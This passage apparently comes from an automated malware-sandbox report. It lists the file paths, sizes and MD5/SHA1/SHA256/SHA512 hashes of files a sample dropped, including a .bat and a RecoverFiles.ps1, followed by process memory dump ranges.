63e45ca731eeb00cbbd89b8870c1cdeeaf6c8ef0

SHA256
c9db5db63e80c488a96460c775e88a7208e6ca278f14128a1267d4d6f3f3187c

SHA512
e8d313fc47f247770e3c346c7a9fe13902e80f1e2a37e08a46a7c0a3026cc3939a84a321f90d09b5aa9f6e7aa0dc799d86bc58e417e8bd4e197d5b62d23dacc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WBPVBat.bat

Filesize
45B

MD5
8f6fe19e0609ab1352a0789cc2f26930

SHA1
0e03b9c99795d0edece5b885211d142e21df56bc

SHA256
390d8088e112cd92ed0f9be3ac1cc127e6cdf482d0b7546ec869c73d85a6d682

SHA512
d4fce506abdb0c25564a99b1d49e067197d61b2fc43fcc7bb063d1fc084cc1591162ae8a3c20c78558bb0543ea892323aacc4d609658ea1593f936f1ff13b17a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZBRecoveredFolder\RecoverFiles.ps1

Filesize
253B

MD5
c2a812a536121ead50a97e6dca817b19

SHA1
d56a1b38c4161f03e01bc95e3d5172c1b54b6143

SHA256
e73f61c7505305910b75d1794b43b1d3030034459e2cb0e723d4f3b16384554e

SHA512
bab9271abc4e6da9c7c3aba74ec59e98d4325888235d1e364045ddaeef5aec42342ef4683a4541019f7190af160f555d673e9924ab8daf09b8816350b4d2ce46

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IVEBWD5ZTERRU74IY2C6.temp

Filesize
7KB

MD5
40a059135793a499dafbfe46c38b4449

SHA1
34d92d7cfca78c1b971300a0fbfa796994c73362

SHA256
19703af169da7e8e8edc3e2d8daa206a6305fe8f4ca60ee8c8e61920c7b7f9a5

SHA512
c82e8e0382bf909a838f21bda850cdefcc13cf7846c1284cb9d265cd1f766a1d4c07657ff30a5e7536c88564118cdb3346456d40d37189fa74187e8425335ead

Download Submit
memory/2148-142-0x000007FEF4F80000-0x000007FEF591D000-memory.dmp

Filesize
9.6MB

Download
memory/2148-140-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

Filesize
2.9MB

Download
memory/2148-148-0x000007FEF4F80000-0x000007FEF591D000-memory.dmp

Filesize
9.6MB

Download
memory/2148-147-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2148-144-0x000007FEF4F80000-0x000007FEF591D000-memory.dmp

Filesize
9.6MB

Download
memory/2148-145-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2148-141-0x0000000002490000-0x0000000002498000-memory.dmp

Filesize
32KB

Download
memory/2148-143-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2664-127-0x0000000002310000-0x0000000002390000-memory.dmp

Filesize
512KB

Download
memory/2664-120-0x000000001B230000-0x000000001B512000-memory.dmp

Filesize
2.9MB

Download
memory/2664-121-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

Filesize
9.6MB

Download
memory/2664-123-0x0000000002310000-0x0000000002390000-memory.dmp

Filesize
512KB

Download
memory/2664-128-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

Filesize
9.6MB

Download
memory/2664-122-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/2664-126-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

Filesize
9.6MB

Download
memory/2664-125-0x0000000002310000-0x0000000002390000-memory.dmp

Filesize
512KB

Download
memory/2664-124-0x0000000002310000-0x0000000002390000-memory.dmp

Filesize
512KB

Download
memory/2852-0-0x0000000000080000-0x00000000000F0000-memory.dmp

Filesize
448KB

Download
memory/2852-7-0x000007FEF58D0000-0x000007FEF62BC000-memory.dmp

Filesize
9.9MB

Download
memory/2852-2-0x000007FEF58D0000-0x000007FEF62BC000-memory.dmp

Filesize
9.9MB

Download